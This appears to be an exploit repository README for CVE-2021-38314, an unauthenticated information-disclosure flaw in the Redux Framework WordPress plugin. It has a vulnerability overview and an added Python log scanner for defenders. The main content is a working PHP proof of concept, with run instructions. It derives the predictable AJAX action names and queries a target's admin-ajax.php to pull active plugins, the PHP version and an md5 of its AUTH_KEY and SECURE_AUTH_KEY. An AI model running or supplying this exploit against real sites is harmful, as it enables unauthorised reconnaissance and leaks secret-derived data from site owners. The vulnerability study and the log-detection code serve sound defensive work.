CVE-2021-38314 - Unauthenticated Sensitive Information Disclosure

Overview

The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php. The action names were unique to a given site but deterministic and predictable, because they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of the site's AUTH_KEY concatenated with the SECURE_AUTH_KEY [1][2].
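Because the action names depend only on the public site URL, a site owner can compute them for their own site and look for them in web server logs. The following is an added example, not part of the original repository: it assumes combined-format access logs, a hypothetical site `https://blog.example`, and that the URL is hashed with a trailing slash; the log lines are constructed.

```python
import hashlib
import re
from urllib.parse import parse_qs, urlsplit

HEX32 = re.compile(r"^[0-9a-f]{32}$")
# Client, request target and status from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def predictable_actions(site_url):
    """Action names anyone can compute from the public site URL."""
    base = site_url.rstrip("/") + "/"  # assumption: hashed with trailing slash
    first = hashlib.md5((base + "-redux").encode()).hexdigest()
    second = hashlib.md5((first + "-support").encode()).hexdigest()
    return {first: "redux-hash", second: "support-hash"}


def scan(lines, site_url):
    """Return (client, label, status) for each suspicious admin-ajax hit."""
    known = predictable_actions(site_url)
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        query = parse_qs(parts.query)
        action = query.get("action", [""])[0].lower()
        if not HEX32.match(action):
            continue  # ordinary named AJAX actions are out of scope
        # Unknown 32-hex actions are still reported; a "code" parameter raises priority.
        fallback = "hash-action-with-code" if "code" in query else "hash-action"
        findings.append((client, known.get(action, fallback), int(status)))
    return findings


# Constructed sample input for the hypothetical site https://blog.example
SITE = "https://blog.example"
FIRST, SECOND = predictable_actions(SITE)
AJAX = "/wp-admin/admin-ajax.php"
OTHER = "0123456789abcdef" * 2  # constructed 32-hex value, not a real hash
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Sep/2021:10:00:00 +0000] "GET {AJAX}?action={FIRST} HTTP/1.1" 200 32',
    f'203.0.113.7 - - [01/Sep/2021:10:00:01 +0000] "GET {AJAX}?action={OTHER}&code=x HTTP/1.1" 200 512',
    f'198.51.100.4 - - [01/Sep/2021:10:00:02 +0000] "GET {AJAX}?action=heartbeat HTTP/1.1" 200 10',
]
```

Requests that send `action` in a POST body do not appear in the access log query string, so this only covers GET-style probes.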

Source code

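<?php
$target = "https://target.com";
// First AJAX action name: md5 of the site URL plus the known '-redux' salt
$key1 = md5("$target/-redux");
// Response returned by the first unauthenticated AJAX action
$key2 = file_get_contents("$target/wp-admin/admin-ajax.php?action=$key1");
// Second AJAX action name: md5 of that response plus the known '-support' salt
$key3 = md5($key2. '-support');
// Value returned by verify.redux.io for this hash and site
$redux_code = file_get_contents("http://verify.redux.io/?hash=$key3&site=$target/");
// Second AJAX action, called with the code, prints the disclosed site information
echo file_get_contents("$target/wp-admin/admin-ajax.php?action=$key3&code=$redux_code");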

Save the source code above to a file with a .php extension.

How To Run

usage

References:

Owner
Tri Wanda Septian